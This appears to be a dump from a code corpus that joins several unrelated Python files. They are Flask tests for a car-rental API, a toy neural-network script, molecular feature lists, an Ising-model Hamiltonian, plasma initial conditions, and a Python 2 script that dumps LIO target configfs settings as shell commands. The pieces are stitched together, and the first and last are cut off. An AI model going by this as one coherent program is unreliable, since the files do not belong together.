self.assertTrue(liscence_json['liscence_3'] == liscence_data['liscence_3'])
self.assertTrue(liscence_json['liscence_4'] == liscence_data['liscence_4'])
self.assertTrue(liscence_json['birth'] == liscence_data['birth'])
self.assertTrue(liscence_json['serialNumber'] == liscence_data['serialNumber'])
def test_empty_liscence(self):
self.register_user_with_phone(email = 'todhm@naver.com',name='강희명')
with self.client.session_transaction() as session:
rv = self.client.get('/api/get_liscence')
liscence_json = json.loads(rv.get_data().decode('utf-8'))
self.assertTrue(liscence_json.get('liscecne_1')is None)
def test_caroption_add(self):
car = self.return_car_obj()
data = self.get_caroption_data()
url = '/api/add_car_option'+ "/" + str(car.id)
rv2=self.client.post(
url,
data=json.dumps(data),
content_type='application/json',
follow_redirects=True
)
carOption = CarOption.query.filter(CarOption.id==car.id).first()
self.validate_caroption(data,carOption)
def test_add_caroption_without_carData(self):
self.register_user_with_phone(email = 'todhm@naver.com',name='강희명')
data = self.get_caroption_data()
rv2=self.client.post('/api/add_car_option/1',
data=json.dumps(data),
content_type='application/json',
follow_redirects=True)
self.assertTrue(rv2.status_code==403)
def test_add_caroption_with_unvalid_carData(self):
car = self.return_car_obj()
data = self.get_caroption_data()
data.pop('price')
url = '/api/add_car_option'+ "/" + str(car.id)
rv2=self.client.post(
url,
data=json.dumps(data),
content_type='application/json',
follow_redirects=True
)
self.assertEqual(rv2.status_code,403)
def test_update_caroption(self):
car = self.return_car_obj()
data = self.get_caroption_data()
url = '/api/add_car_option'+ "/" + str(car.id)
rv2=self.client.post(
url,
data=json.dumps(data),
content_type='application/json',
follow_redirects=True
)
data['price'] = 400000
data['description']='자동차가 업드레이드되서 돈을 조금 더 받아야할것 같습니다. '
rv3 = self.client.post(
url,
data=json.dumps(data),
content_type='application/json',
follow_redirects=True
)
carOption = CarOption.query.filter(CarOption.id==car.id).first()
self.validate_caroption(data,carOption)
def test_get_caroption(self):
car = self.return_car_obj()
data = self.get_caroption_data()
url = '/api/add_car_option'+ "/" + str(car.id)
rv2=self.client.post(
url,
data=json.dumps(data),
content_type='application/json',
follow_redirects=True
)
url = '/api/get_car_option'+ "/" + str(car.id)
carOption = CarOption.query.filter(CarOption.id==car.id).first()
rv3 = self.client.get(
url,
content_type='application/json',
follow_redirects=True
)
json_data = json.loads(rv3.get_data().decode('utf-8'))
self.validate_caroption(json_data,carOption)
def test_empty_caroption(self):
car = self.return_car_obj()
data = self.get_caroption_data()
url = '/api/get_car_option'+ "/" + str(car.id)
carOption = CarOption.query.filter(CarOption.id==car.id).first()
rv3 = self.client.get(
url,
content_type='application/json',
follow_redirects=True
)
json_data = json.loads(rv3.get_data().decode('utf-8'))
self.assertTrue(isinstance(json_data,dict))
def test_add_proper_image(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
with open(test_image_url, 'r+b') as f:
rv= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
imgUrl =json.loads(rv.get_data().decode('utf-8'))['imgList']
self.assertTrue(len(imgUrl)==1)
self.assertTrue(carImage.active ==1)
self.assertTrue(carImage.image_index == 0)
with open("."+carImage.imgsrc,"r+b") as f2:
self.assertTrue(f2 is not None )
self.remove_image(carImage.image,car.id)
def test_update_image(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
imgUrl =json.loads(rv1.get_data().decode('utf-8'))['imgList']
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
with open("."+carImage.imgsrc,"r+b") as f:
self.assertTrue(f is not None )
self.remove_image(carImage.image,car.id)
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url, 'r+b') as f2:
rv2 = self.client.post('/api/update_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2,'image_index':0})
imgUrl2 =json.loads(rv2.get_data().decode('utf-8'))['imgList']
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
self.assertTrue(len(imgUrl)==1)
self.assertTrue(carImage.active ==1)
self.assertTrue(carImage.image_index == 0)
print(imgUrl,imgUrl2)
self.assertTrue(imgUrl[0]['url'] != imgUrl2[0]['url'])
with open("."+carImage.imgsrc,"r+b") as f:
self.assertTrue(f is not None )
self.remove_image(carImage.image,car.id)
def test_update_image_multiple_times(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
imgUrl =json.loads(rv1.get_data().decode('utf-8'))['imgList']
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
self.remove_image(carImage.image,car.id)
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url, 'r+b') as f2:
rv2 = self.client.post('/api/update_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2,'image_index':0})
imgUrl2 =json.loads(rv2.get_data().decode('utf-8'))['imgList']
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
self.remove_image(carImage.image,car.id)
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url, 'r+b') as f2:
rv3 = self.client.post('/api/update_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2,'image_index':'0'})
imgUrl3 =json.loads(rv3.get_data().decode('utf-8'))['imgList']
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
self.remove_image(carImage.image,car.id)
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
self.assertTrue(len(imgUrl)==1)
self.assertTrue(carImage.active ==1)
self.assertTrue(carImage.image_index == 0)
self.assertTrue(imgUrl[0]['url'] != imgUrl2[0]['url'])
self.assertTrue(imgUrl[0]['url'] != imgUrl3[0]['url'])
self.assertTrue(imgUrl2[0]['url'] != imgUrl3[0]['url'])
def test_add_multiple_valid_image(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
test_image_url2 = "."+TEST_UPLOADED_FOLDER + "/background4.jpg"
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1 =self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
frozen_datetime.tick(delta=timedelta(seconds=1))
with open(test_image_url2, 'r+b') as f2:
rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2,'image_index':1})
imgUrl1 =json.loads(rv1.get_data().decode('utf-8'))['imgList']
imgUrl2 =json.loads(rv2.get_data().decode('utf-8'))['imgList']
self.assertTrue(len(imgUrl1)==1)
self.assertTrue(len(imgUrl2)==2)
for idx,img in enumerate(imgUrl2):
with open( "."+img['url'], 'r+b') as f3:
self.assertTrue(f3 is not None)
self.assertTrue(img['image_index'] ==idx)
os.remove("."+img['url'])
@freeze_time("Jan 14th, 2020", tick=True)
def test_get_car_img(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
frozen_datetime.tick(delta=timedelta(seconds=1))
with open(test_image_url, 'r+b') as f2:
rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2,'car_index':1})
img_response = json.loads(self.client.get('/api/get_images/'+car_id).get_data().decode('utf-8'))
self.assertTrue(img_response['message']=="success")
self.assertTrue(len(img_response['imgList'])==2)
for idx,img in enumerate(img_response['imgList']):
with open("."+img['url'],"r+b") as f3:
self.assertTrue(img['image_index']==idx)
self.assertTrue(f3 is not None )
os.remove("."+img['url'])
def test_remove_img(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
with open(test_image_url, 'r+b') as f:
rv= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
removeUrl={}
removeUrl['image_index'] = 0
rv = self.client.post('/api/remove_image/' + car_id,
data=json.dumps(removeUrl),
content_type='application/json',
follow_redirects= True
)
carImage = CarImage.query.filter(CarImage.car_id==car_id).filter(CarImage.active==False).all()
self.assertTrue(len(carImage)==1)
self.assertTrue(rv.status_code==200)
for carimg in carImage:
self.remove_image(carimg.image,car_id)
@freeze_time("Jan 14th, 2020", tick=True)
def test_remove_multiple_img(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
test_image_url2 = "."+TEST_UPLOADED_FOLDER + "/background4.jpg"
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url2, 'r+b') as f2:
rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2})
imgUrl =json.loads(rv2.get_data().decode('utf-8'))['imgList']
removeUrl={}
removeUrl['image_index'] = 0
for img in imgUrl:
os.remove("."+img['url'])
with freeze_time(dt.now()) as frozen_datetime:
rv = self.client.post('/api/remove_image/' + car_id,
data=json.dumps(removeUrl),
content_type='application/json',
follow_redirects= True
)
removeUrl['image_index'] = 1
frozen_datetime.tick(delta=timedelta(hours=1))
rv2 = self.client.post('/api/remove_image/' + car_id,
data=json.dumps(removeUrl),
content_type='application/json',
follow_redirects= True
)
carImage = CarImage.query.filter(CarImage.car_id==car_id).filter(CarImage.active==False).all()
self.assertTrue(len(carImage)==2)
self.assertTrue(rv.status_code==200)
self.assertTrue(rv2.status_code==200)
@freeze_time("Jan 14th, 2020", tick=True)
def test_add_invalid_img(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/hm.jpg"
with open(test_image_url, 'r+b') as f:
rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
data = json.loads(rv1.data.decode())
self.assertTrue(data['message']=="fail")
carImage = CarImage.query.filter(CarImage.car_id==car_id).all()
self.assertTrue(len(carImage)==0)
def test_get_inactive_car(self):
car = self.return_car_obj()
car_id = str(car.id)
rv = self.client.get('/api/get_images/'+car_id)
data = json.loads(rv.data.decode())
self.assertTrue(data['active']==False)
def test_get_active_car(self):
car = self.return_car_obj()
car_id = str(car.id)
self.assertTrue(car.active ==0)
rv = self.client.post('/api/activate_car/'+car_id)
rv = self.client.get('/api/get_images/'+car_id)
data = json.loads(rv.data.decode())
self.assertTrue(data['active']==True)
def test_car_activate(self):
car = self.return_car_obj()
car_id = str(car.id)
self.assertTrue(car.active ==0)
rv = self.client.post('/api/activate_car/'+car_id)
self.assertTrue("success" in rv.get_data().decode('utf-8'))
car = Car.query.filter(Car.id==car_id).first()
self.assertTrue(rv.status_code ==200)
self.assertTrue(car.active ==1)
#한사용자가 여러대의 차량을 등록해놓고 사진을 업데이트 시키면 다른자동차의 사진이 없어지는 문제를 확인하기 위한 테스트.
def test_update_multiple_images(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
test_image_url2 = "."+TEST_UPLOADED_FOLDER + "/background4.jpg"
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1 =self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url2, 'r+b') as f2:
rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f2,'image_index':1})
car2 = self.return_car_obj(remainUser= True)
car_2id = str(car2.id)
with freeze_time(dt.now()) as frozen_datetime:
with open(test_image_url, 'r+b') as f:
rv1 =self.client.post('/api/upload_image/' + car_2id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url2, 'r+b') as f2:
rv2 = self.client.post('/api/upload_image/' + car_2id, buffered=True,
content_type='multipart/form-data',
data={'image':f2})
frozen_datetime.tick(delta=timedelta(hours=1))
with open(test_image_url2, 'r+b') as f:
rv2 = self.client.post('/api/update_image/' + car_2id, buffered=True,
content_type='multipart/form-data',
data={'image':f,'image_index':0})
carImage = CarImage.query.filter(CarImage.car_id==car_id).filter(CarImage.active==True).filter(CarImage.image_index==0).first()
car2Image = CarImage.query.filter(CarImage.car_id==car_2id).filter(CarImage.active==True).filter(CarImage.image_index==0).first()
with open("."+carImage.imgsrc,"r+b") as f:
self.assertTrue(f is not None )
with open("."+car2Image.imgsrc,"r+b") as f:
self.assertTrue(f is not None )
#차량등록시 사용자들이 알맞은 위치에 존재하고 있는지 확인
def test_get_last_status(self):
#차량 처음등록일경우.
self.register_user_with_phone(email = 'todhm@naver.com')
rv = self.client.get('/api/getLastStatus')
data = json.loads(rv.data.decode())
self.assertEqual(data['stage_name'], ["자동차 등록","면허*계좌등록","세부사항조정","사진 등록","최종확인"])
#은행계좌등록.
def test_bank_account(self):
# 제대로된 계좌가 아닌경우.
user = self.register_user_with_phone(email='todhm@naver.com')
bank_info = self.get_bank_info()
origin_birth = bank_info['account_holder_info']
original_account = bank_info['account_num']
bank_info['account_holder_info'] = origin_birth[1:]
rv = self.client.post(
'/api/add_bank_account',
data=json.dumps(bank_info),
content_type='application/json'
)
result = json.loads(rv.data.decode())
self.assertTrue(result['message']!="success")
self.assertEqual(rv.status_code,400)
#은행계좌등록.
def test_get_bank_account(self):
user = self.register_user_with_phone(email='todhm@naver.com')
bank = self.add_bank(user.id)
rv = self.client.get('/api/get_bank_account')
bank_info = json.loads(rv.data.decode())
bank_info.pop('message')
self.verify_data(bank,bank_info)
# 제대로된 계좌가 아닌경우.
#가격불러오기.
def test_get_car_price(self):
car = self.activate_car_without_img()
rv = self.client.get("/api/get_car_price/"+car.id)
response = json.loads(rv.data.decode())
self.assertTrue(car.caroption.price==response['ordinaryPrice'])
self.assertTrue(0==response['weeklyDiscount'])
self.assertTrue(0==response['monthlyDiscount'])
#가격 및 주별 월별 할인율 추가
def test_add_car_ordinary_price(self):
car = self.activate_car_without_img()
price_info = dict(
ordinaryPrice=5000,
weeklyDiscount=10,
monthlyDiscount=30
)
rv = self.client.post(
'/api/add_car_ordinary_price/'+car.id,
data=json.dumps(price_info),
content_type='application/json'
)
response = json.loads(rv.data.decode())
self.assertTrue(response['message']=="success")
self.assertTrue(price_info['ordinaryPrice']==car.caroption.price)
self.assertTrue(price_info['weeklyDiscount']==car.caroption.weekly_discount)
self.assertTrue(price_info['monthlyDiscount']==car.caroption.monthly_discount)
| 29,469 | 9,708 |
# train-net.py
# Use the neural network module to detect simple signals
import numpy as np
import matplotlib.pyplot as plt
import random
from src.net import Net
def main():
""" Step 1: make dataset """
random.seed()
# Make 3 inputs - 1 base and 2 added inputs
sig_len = 10
y_base = np.array([1, 2, 3, 2, 6, 5, 0, -1, 2, 4])
y_add1 = np.array([0, 0, 1, 0, -2, 0, 0, 1, 1, 0])
y_add2 = np.array([1, 0, 0, 1, 2, -1, 0, 0, 0, 0])
# Set up a bunch of random signals to detect
y_num = 100
signal1 = np.array([random.randint(0,1) for i in range(y_num)])
signal2 = np.array([random.randint(0,1) for i in range(y_num)])
signal = np.array([signal1, signal2])
# Add up the inputs accordingly
y_list = np.zeros([y_num, len(y_base)])
for i in range(y_num):
y_sum = np.array([y_base[j] + signal1[i]*y_add1[j] + signal2[i]*y_add2[j]
for j in range(sig_len)])
y_list[i] = y_sum
# Add noise
noise = np.random.random([y_num, len(y_base)]) / 10
y_list += noise
""" Step 2: train neural network """
# Set up input and signals
input = np.array(y_list)
signal = signal.transpose()
# Set up min and max for each input
# Can give the network a good idea of input ranges or just a rough range
limits = [[y_base[i]-2, y_base[i]+2] for i in range(10)]
#limits = [[-20, 20]]*10
# Make network
net = Net(limits, 2, 2)
errorList = net.train_many(input, signal, 0.1, 100, 0.001, True)
print "\n".join(map(str, errorList))
""" Step 3: check results """
# Print results by hand
#for i in range(y_num):
# print y_list[i]
# print signal1[i]
# print signal2[i]
# print net.sim(y_list[i, :])
# Plot error vs. training epochs
plt.semilogy(errorList)
plt.grid()
plt.xlabel('Epochs')
plt.ylabel('SSE')
plt.show() | 1,947 | 777 |
# allowable multiple choice node and edge features
# code from https://github.com/snap-stanford/ogb/blob/master/ogb/utils/features.py
allowable_features = {
"possible_atomic_num_list": list(range(1, 119)) + ["misc"], # type: ignore
"possible_chirality_list": [
"CHI_UNSPECIFIED",
"CHI_TETRAHEDRAL_CW",
"CHI_TETRAHEDRAL_CCW",
"CHI_OTHER",
],
"possible_degree_list": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, "misc"],
"possible_formal_charge_list": [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, "misc"],
"possible_numH_list": [0, 1, 2, 3, 4, 5, 6, 7, 8, "misc"],
"possible_number_radical_e_list": [0, 1, 2, 3, 4, "misc"],
"possible_hybridization_list": ["SP", "SP2", "SP3", "SP3D", "SP3D2", "misc"],
"possible_is_aromatic_list": [False, True],
"possible_is_in_ring_list": [False, True],
"possible_bond_type_list": ["SINGLE", "DOUBLE", "TRIPLE", "AROMATIC", "misc"],
"possible_bond_stereo_list": [
"STEREONONE",
"STEREOZ",
"STEREOE",
"STEREOCIS",
"STEREOTRANS",
"STEREOANY",
],
"possible_is_conjugated_list": [False, True],
}
def get_atom_feature_dims():
return list(
map(
len,
[
allowable_features["possible_atomic_num_list"],
allowable_features["possible_chirality_list"],
allowable_features["possible_degree_list"],
allowable_features["possible_formal_charge_list"],
allowable_features["possible_numH_list"],
allowable_features["possible_number_radical_e_list"],
allowable_features["possible_hybridization_list"],
allowable_features["possible_is_aromatic_list"],
allowable_features["possible_is_in_ring_list"],
],
)
)
def get_bond_feature_dims():
return list(
map(
len,
[
allowable_features["possible_bond_type_list"],
allowable_features["possible_bond_stereo_list"],
allowable_features["possible_is_conjugated_list"],
],
)
)
| 2,165 | 794 |
"""coupling Hamiltonian class def"""
from math import exp
import numpy as np
from .spinconfig import SpinConfig
class Hamiltonian():
"""Create a class of Hamiltonian of 2-d Ising model.
Parameters
----------
J: float, optional
Coupling parameter, default J=-2 .
u: float, optional
External field strength, default u=1.1 .
Returns
-------
Hamiltonian: class
A Hamiltonian of a Ising model with J: coupling strength, u: external field factor.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. J
-2
"""
def __init__(self, J=-2, u=1.1):
self.u = u
self.J = J
def energy(self, spinlist):
"""Calculate the energy of a given spinconfiguration.
Parameters
----------
spinlist : list
Spin configuration represented in '1': spin up, '0': spin down.
Returns
-------
energy : float
Total energy out from both the external filed and coupling from neighbor spins.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. energy([0,1,0,1,1])
-4.9
"""
self.spinlist = spinlist
E = 0
# Energy from the external field:
# H_external = Sum over i of u * spin[i]
for eachspin in self.spinlist:
if eachspin == 1:
E += self.u * 1
elif eachspin == 0:
E += self.u * (-1)
else:
print("Spin input error")
# Energy from coupling the nearest neighbor spin:
# H_c = -J/k * spin[i] * spin[i+1]
newList = self.spinlist[1:]
newList.append(self.spinlist[0])
for spinx, spiny in zip(self.spinlist, newList):
if spinx == spiny:
E += -self.J * 1
elif spinx != spiny:
E += -self.J * (-1)
else:
print("Type error spininput")
return E
def average(self, T=1, N=0):
"""Calculate the oberservables of a given spin list with N sites.
Parameters
----------
T : float, optional
Temperature of the system.
N : interger, optional
The site number of a spin list.
Returns
-------
E, m, C, ms : set
Average energy, average magnetism, heat capacibility, magnetic susceptbility.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. average(10, 4)
(-1.894905381126034,
-0.29386784002835087,
0.17850826588133842,
0.26682385808137565)
"""
mySpin = SpinConfig(N)
Zsum = 0
E = 0
EE = 0
m = 0
mm = 0
for i in range(mySpin.iMax):
myspinlist = mySpin.input_decimal(i)
mi = mySpin.magnetization()
Ei = self.energy(myspinlist)
Zi = exp(-Ei/T)
Zsum += Zi
E += Zi * Ei
EE += Zi * Ei*Ei
m += Zi * mi
mm += Zi * mi * mi
# get average energy
E = E/Zsum
EE = EE/Zsum
# get average magnetism
m = m/Zsum
mm = mm/Zsum
# get capacity
C = (EE - E**2)/(T*T)
# get magnetic susceptibility
ms = (mm - m**2)/(T)
return E, m, C, ms
| 3,401 | 1,106 |
import numpy as np
def temperature(x):
pass
def density(x, L):
# weak Jeans instability
# density = 1. + 0.01 * np.cos(0.8 * (x - 0.5 * L))
# strong Jeans instability
# density = 1. + 0.01 * np.cos(0.1 * (x - 0.5 * L))
# linear Landau damping
# return 1. + 0.01 * np.cos(0.5 * (x - 0.5 * L))
# nonlinear Landau damping
density = 1. + (np.cos(0.5 * x))
return density
def distribution(x, y):
# if y <= 2. and y >= -2.:
# f = 1.
# else:
# f = 0.
f = 1. + 0.5 * (np.cos(x + y*np.pi) - np.cos(x - y*np.pi))
return f
| 618 | 290 |
#!/usr/bin/python
import os, sys, shutil
import subprocess as sub
import string
import re
import datetime, time
import optparse
target_root = "/sys/kernel/config/target/"
spec_root = "/var/target/fabric/"
def fabric_err(msg):
print >> sys.stderr, msg
sys.exit(1)
def fabric_configfs_dump(fabric_name, fabric_root, module_name):
if not os.path.isdir(fabric_root):
print "Unable to access fabric_root: " + fabric_root
sys.exit(1)
iqn_root = os.listdir(fabric_root)
# This will load up the fabric module
print "modprobe " + module_name
print "mkdir " + fabric_root
# print "#### " + fabric_name + " Discovery authentication information"
auth_dir = fabric_root + "/discovery_auth"
if os.path.isdir(auth_dir) == True:
for auth in os.listdir(auth_dir):
if auth == "authenticate_target":
continue
auth_file = auth_dir + "/" + auth
p = os.open(auth_file, 0)
value = os.read(p, 256)
ret = value.isspace()
if ret:
os.close(p)
continue
print "echo -n " + value.rstrip() + " > " + auth_file
os.close(p)
iqn_root = os.listdir(fabric_root)
# Loop through LIO-Target IQN list
for iqn in iqn_root:
if not os.path.isdir(fabric_root + "/" + iqn):
continue
if iqn == "lio_version":
continue
if iqn == "discovery_auth":
continue
# Loop through LIO-Target IQN+TPGT list
tpg_root = os.listdir(fabric_root + "/" + iqn);
for tpgt_tmp in tpg_root:
if tpgt_tmp == "fabric_statistics":
continue
tpgt_tmp2 = tpgt_tmp.split('_')
tpgt = tpgt_tmp2[1]
# print "#### Network portals for iSCSI Target Portal Group"
# np_root = os.listdir(fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/np")
# for np in np_root:
# print "mkdir -p " + fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/np/" + np
# Dump Nexus attribute (when available)
nexus_file = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/nexus"
if os.path.isfile(nexus_file):
print "mkdir -p " + fabric_root + "/" + iqn + "/tpgt_" + tpgt
p = os.open(nexus_file, 0)
value = os.read(p, 256)
print "echo " + value.rstrip() + " > " + nexus_file
os.close(p)
print "#### " + fabric_name + " Target Ports"
lun_root = os.listdir(fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/lun")
for lun_tmp in lun_root:
lun_tmp2 = lun_tmp.split('_')
lun = lun_tmp2[1]
lun_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/lun/lun_" + lun
print "mkdir -p " + lun_dir
port_root = os.listdir(lun_dir)
for port in port_root:
if port == "alua_tg_pt_gp":
continue
if port == "alua_tg_pt_offline":
continue
if port == "alua_tg_pt_status":
continue
if port == "alua_tg_pt_write_md":
continue
if not os.path.islink(lun_dir + "/" + port):
continue
port_link = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/lun/lun_" + lun + "/" + port
sourcelink = os.readlink(port_link)
sourcelink2 = os.path.join(os.path.dirname(port_link), sourcelink)
print "ln -s " + sourcelink2 + " " + port_link
# Dump ALUA Target Port Group
tg_pt_gp_file = lun_dir + "/alua_tg_pt_gp"
p = os.open(tg_pt_gp_file, 0)
try:
value = os.read(p, 512)
except:
os.close(p)
continue
os.close(p)
if value:
tg_pt_gp_tmp = value.split('\n')
tg_pt_gp_out = tg_pt_gp_tmp[0]
off = tg_pt_gp_out.index('Alias: ')
off += 7 # Skip over "Alias: "
tg_pt_gp_name = tg_pt_gp_out[off:]
# Only need to dump if LIO-Target Port is NOT partof
# the 'default_tg_pt_gp'
if not re.search(tg_pt_gp_name, 'default_tg_pt_gp'):
print "#### ALUA Target Port Group"
print "echo " + tg_pt_gp_name + " > " + tg_pt_gp_file
#FIXME: --aluasecmd support
# print "lio_node --aluasecmd " + iqn + " " + tpgt + " " + lun
# Dump values of iscsi/iqn/tpgt/attrib/
print "#### Attributes for " + fabric_name + " Target Portal Group"
attrib_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/attrib/"
attrib_root = os.listdir(attrib_dir)
for attrib in attrib_root:
attrib_file = attrib_dir + attrib
p = os.open(attrib_file, 0)
value = os.read(p, 16)
print "echo " + value.rstrip() + " > " + attrib_file
os.close(p)
# Dump values for iscsi/iqn/tpgt/param
print "#### Parameters for " + fabric_name + " Target Portal Group"
param_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/param/"
param_root = os.listdir(param_dir)
for param in param_root:
param_file = param_dir + param
p = os.open(param_file, 0)
value = os.read(p, 256)
print "echo \"" + value.rstrip() + "\" > " + param_file
os.close(p)
if os.path.isfile(nexus_file):
continue
# Dump fabric Initiator Node ACLs from fabric_root/$WWN/tpgt_$TPGT/acls/
print "#### " + fabric_name + " Initiator ACLs for " + fabric_name + " Target Portal Group"
nacl_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/acls/"
nacl_root = os.listdir(nacl_dir)
for nacl in nacl_root:
print "mkdir -p " + nacl_dir + nacl
# Dump fabric Initiator ACL authentication info from fabric_root/$WWN/tpgt_$TPGT/acls//$INITIATOR/auth
print "#### " + fabric_name + " Initiator ACL authentication information"
auth_dir = nacl_dir + nacl + "/auth"
for auth in os.listdir(auth_dir):
if auth == "authenticate_target":
continue
auth_file = auth_dir + "/" + auth
p = os.open(auth_file, 0)
value = os.read(p, 256)
ret = value.isspace()
if ret:
os.close(p)
continue
print "echo -n " + value.rstrip() + " > " + auth_file
os.close(p)
# Dump fabric Initiator ACL TPG attributes from fabric_root/$WWN/tpgt_$TPGT/acls/$INITIATOR/attrib
print "#### " + fabric_name + " Initiator ACL TPG attributes"
nacl_attrib_dir = nacl_dir + nacl + "/attrib"
for nacl_attrib in os.listdir(nacl_attrib_dir):
nacl_attrib_file = nacl_attrib_dir + "/" + nacl_attrib
p = os.open(nacl_attrib_file, 0)
value = os.read(p, 8)
print "echo " + value.rstrip() + " > " + nacl_attrib_file
os.close(p)
# Dump fabric Initiator LUN ACLs from fabric_root/$WWN/tpgt_$TPGT//acls/$INITIATOR/lun
print "#### " + fabric_name + " Initiator LUN ACLs for iSCSI Target Portal Group"
lun_acl_dir = nacl_dir + nacl
for lun_acl in os.listdir(lun_acl_dir):
ret = re.search('lun_', lun_acl)
if not ret:
continue
lun_link_dir = nacl_dir + nacl + "/" + lun_acl
print "mkdir -p " + lun_link_dir
for lun_acl_link in os.listdir(lun_link_dir):
if lun_acl_link == "write_protect":
p = os.open(lun_link_dir + "/write_protect", 0)
value = os.read(p, 4)
print "echo " + value.rstrip() + " > " + lun_link_dir + "/write_protect"
os.close(p)
continue
if not os.path.islink(lun_link_dir + "/" + lun_acl_link):
continue
sourcelink = os.readlink(lun_link_dir + "/" + lun_acl_link)
sourcelink2 = os.path.join(os.path.dirname(lun_link_dir + "/" + lun_acl_link), sourcelink)
print "ln -s " + sourcelink2 + " " + lun_link_dir + "/" + lun_acl_link
# Dump value of fabric_root/$WWN/tpgt_$TPGT//enable
print "#### Trigger to enable " + fabric_name + " Target Portal Group"
enable_file = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/enable"
if os.path.isfile(enable_file):
p = os.open(enable_file, 0)
value = os.read(p, 1)
print "echo " + value.rstrip() + " > " + enable_file
os.close(p)
return
def fabric_configfs_dump_all():
for fabric_name in os.listdir(target_root):
if fabric_name == "version":
continue
if fabric_name == "core":
continue
# FIXME: currently using lio_dump --stdout
if fabric_name == "iscsi":
continue
fabric_root = target_root + fabric_name
# print "Using fabric_configfs_dump_all: " + fabric_name + ", " + fabric_root
module_name = fabric_get_module_name(fabric_name)
# print "module_name: "+ module_name
fabric_configfs_dump(fabric_name, fabric_root, module_name);
return
def fabric_backup_to_file(date_time, fabric_name, fabric_root, module_name):
now = date_time
if not os.path.isdir(fabric_root):
print "Unable to access fabric_root: " + fabric_root
sys.exit(1)
current_dir = "/etc/target"
backup_dir = "/etc/target/backup"
if not os.path.isdir(backup_dir):
op = "mkdir " + backup_dir
ret = os.system(op)
if ret:
print "Unable to open backup_dir"
sys.exit(1)
op = "tcm_fabric --stdout --fabric-name=" + fabric_name + " --fabric-root=" + fabric_root + " --module-name=" + module_name
# print "Using op: " + op
p = sub.Popen(op, shell=True, stdout=sub.PIPE).stdout
if not p:
print "Unable to dump " + fabric_name + "/ConfigFS running state"
sys.exit(1)
orig_file = current_dir + "/" + fabric_name + "_start.sh"
